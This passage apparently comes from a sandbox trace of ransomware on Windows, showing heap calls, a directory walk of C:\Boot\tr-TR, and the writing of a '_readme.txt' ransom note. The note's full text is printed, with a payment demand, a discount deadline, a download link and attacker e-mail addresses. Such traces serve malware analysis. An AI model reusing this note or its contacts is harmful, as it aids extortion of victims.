hHeap=0x620000, dwFlags=0x0, lpMem=0x325d510 | out: hHeap=0x620000) returned 1 [0142.933] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3221ae8 | out: hHeap=0x620000) returned 1 [0142.933] lstrlenA (lpString="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR") returned 1115 [0142.933] WriteFile (in: hFile=0x6f0, lpBuffer=0x321dfc8*, nNumberOfBytesToWrite=0x45b, lpNumberOfBytesWritten=0x9dbfb64, lpOverlapped=0x0 | out: lpBuffer=0x321dfc8*, lpNumberOfBytesWritten=0x9dbfb64*=0x45b, lpOverlapped=0x0) returned 1 [0142.934] CloseHandle (hObject=0x6f0) returned 1 [0142.934] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x321dfc8 | out: hHeap=0x620000) returned 1 [0142.934] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ab03c8 | out: hHeap=0x620000) returned 1 [0142.935] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ad6f98 | out: hHeap=0x620000) returned 1 [0142.935] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.935] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.935] FindFirstFileW (in: lpFileName="C:\\Boot\\tr-TR\\*", lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xc8cc9eb0, ftLastAccessTime.dwHighDateTime=0x1d62438, ftLastWriteTime.dwLowDateTime=0xc8cc9eb0, ftLastWriteTime.dwHighDateTime=0x1d62438, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3275b30 [0142.935] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.935] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xc8cc9eb0, ftLastAccessTime.dwHighDateTime=0x1d62438, ftLastWriteTime.dwLowDateTime=0xc8cc9eb0, ftLastWriteTime.dwHighDateTime=0x1d62438, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0142.935] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8393ab6, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15440, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0142.935] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc8cc9eb0, ftCreationTime.dwHighDateTime=0x1d62438, ftLastAccessTime.dwLowDateTime=0xc8cc9eb0, ftLastAccessTime.dwHighDateTime=0x1d62438, ftLastWriteTime.dwLowDateTime=0xc8cc9eb0, ftLastWriteTime.dwHighDateTime=0x1d62438, nFileSizeHigh=0x0, nFileSizeLow=0x45b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0142.935] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc8cc9eb0, ftCreationTime.dwHighDateTime=0x1d62438, ftLastAccessTime.dwLowDateTime=0xc8cc9eb0, ftLastAccessTime.dwHighDateTime=0x1d62438, ftLastWriteTime.dwLowDateTime=0xc8cc9eb0, ftLastWriteTime.dwHighDateTime=0x1d62438, nFileSizeHigh=0x0, nFileSizeLow=0x45b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0142.935] FindClose (in: hFindFile=0x3275b30 | out: hFindFile=0x3275b30) returned 1 [0142.935] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.935] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1730 | out: hHeap=0x620000) returned 1 [0142.935] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1730 [0142.935] PeekMessageW (in: lpMsg=0x9dbfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9dbfb74) returned 0 [0142.935] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.935] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0142.935] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.935] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.935] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.935] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aafb40 [0142.935] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.935] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.935] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.935] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aafb40 [0142.936] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.936] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.936] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.936] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aafb40 [0142.936] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.936] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.936] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.936] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aafb40 [0142.936] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.936] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.936] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.936] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x9aafb40 [0142.936] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.936] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.936] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.936] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0142.936] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x325d510 [0142.936] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.936] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325d510 | out: hHeap=0x620000) returned 1 [0142.936] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.936] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.936] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0142.936] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.936] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.936] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.936] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x9aafb40 [0142.936] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.936] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.936] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.936] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3221ae8 [0142.936] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3221ae8 | out: hHeap=0x620000) returned 1 [0142.936] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.936] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.936] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3221ae8 [0142.936] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3221ae8 | out: hHeap=0x620000) returned 1 [0142.936] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.936] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.937] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0142.937] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.937] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.937] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.937] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0142.937] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.937] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.937] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.937] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x9aafb40 [0142.937] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.937] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.937] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.937] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x9aafb40 [0142.937] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.937] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.937] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.937] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aafb40 [0142.937] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.937] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.937] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.937] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aafb40 [0142.937] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.937] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.937] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.937] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aafb40 [0142.937] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.937] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.937] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.937] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0142.937] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.937] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.937] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.937] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0142.937] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.937] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.937] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.937] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0142.937] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.937] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.938] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.938] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aafb40 [0142.938] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.938] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.938] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.938] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aafb40 [0142.938] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x325d510 [0142.938] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.938] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325d510 | out: hHeap=0x620000) returned 1 [0142.938] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.938] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.938] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0142.938] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.938] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.938] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.938] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0142.938] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x325d510 [0142.938] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.938] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325d510 | out: hHeap=0x620000) returned 1 [0142.938] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.938] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.938] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3221ae8 [0142.938] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3221ae8 | out: hHeap=0x620000) returned 1 [0142.938] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.938] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.938] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3221ae8 [0142.938] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3221ae8 | out: hHeap=0x620000) returned 1 [0142.938] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.938] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.938] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0142.938] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.938] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.938] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.938] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0142.938] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.938] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.938] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.939] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aafb40 [0142.939] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x325d510 [0142.939] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.939] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325d510 | out: hHeap=0x620000) returned 1 [0142.939] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.939] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.939] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x9aafb40 [0142.939] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.939] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.939] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.939] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x9aafb40 [0142.939] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.939] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.939] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.939] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aafb40 [0142.939] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.939] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.939] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.939] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aafb40 [0142.939] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.939] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.939] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.939] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aafb40 [0142.939] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.939] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.939] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.939] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0142.939] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.939] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.939] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.939] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0142.939] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.939] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.939] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.939] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0142.939] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.939] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.939] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.939] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aafb40 [0142.940] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.940] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.940] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.940] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aafb40 [0142.940] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x325d510 [0142.940] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.940] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325d510 | out: hHeap=0x620000) returned 1 [0142.940] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.940] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.940] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0142.940] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.940] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.940] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.940] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3221ae8 [0142.940] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3221ae8 | out: hHeap=0x620000) returned 1 [0142.940] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.940] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.940] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3221ae8 [0142.940] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3221ae8 | out: hHeap=0x620000) returned 1 [0142.940] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.940] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.940] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0142.940] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.940] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.940] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.940] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0142.940] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.940] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.940] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.940] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aafb40 [0142.941] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x325d510 [0142.941] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.941] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325d510 | out: hHeap=0x620000) returned 1 [0142.941] HeapFree (in: hHeap=0x620000, dwFlags=0x0, 